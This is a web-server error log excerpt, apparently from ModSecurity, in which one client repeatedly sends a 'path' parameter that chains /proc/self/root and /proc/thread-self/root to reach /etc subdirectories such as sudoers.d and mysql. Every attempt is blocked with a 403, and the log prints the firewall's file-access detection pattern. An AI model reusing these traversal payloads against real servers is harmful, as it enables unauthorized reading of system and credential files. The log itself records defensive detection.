"/"] [unique_id "ab06Y_HIg5MgXLBnicMFtgAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:34.109270 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:46610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06ZjJ3M9BSuKP7CAYthgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:36.747633 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.243.128:46618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06aDJ3M9BSuKP7CAYtigAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:38.084600 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:46632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06avXLqtnMIWvjpaKpOwAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:41.565069 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.243.128:58250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06bPHIg5MgXLBnicMFvAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:43.082798 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:58266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06b9a6ubjKNq_cu4bloQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:44.493816 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:58280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06cNa6ubjKNq_cu4blpAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:44.716316 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:58280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06cNa6ubjKNq_cu4blpQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:46.067634 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:58294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06cuoXxyEfFpUF8f-PVwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:47.402044 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.243.128:58306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06c_HIg5MgXLBnicMFyQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:50.815473 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:58322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06drninkcc-iUj5ApszAAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:52.113482 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:36136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06eBCii7xarUs8iHZ2UQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:55.681465 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:36144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06e11pVZ5mVmJwsFNAmQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:15:58.151473 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:36152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06fjJ3M9BSuKP7CAYtkwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:02.315335 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:33158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06gl1pVZ5mVmJwsFNAnwAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:03.699213 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.243.128:33172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06gwF0L0L-SsrnPo53gAAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:12.083195 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.243.128:33184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06jAF0L0L-SsrnPo53jQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:16.741514 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:38180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06kOoXxyEfFpUF8f-PcAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:20.770009 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.243.128:38188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06lF1pVZ5mVmJwsFNAsAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:35.102444 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:43854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06o9a6ubjKNq_cu4bl5QAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:36.583292 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:45784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06pBCii7xarUs8iHZ2cgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:38.886712 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:45796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06pda6ubjKNq_cu4bl6AAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
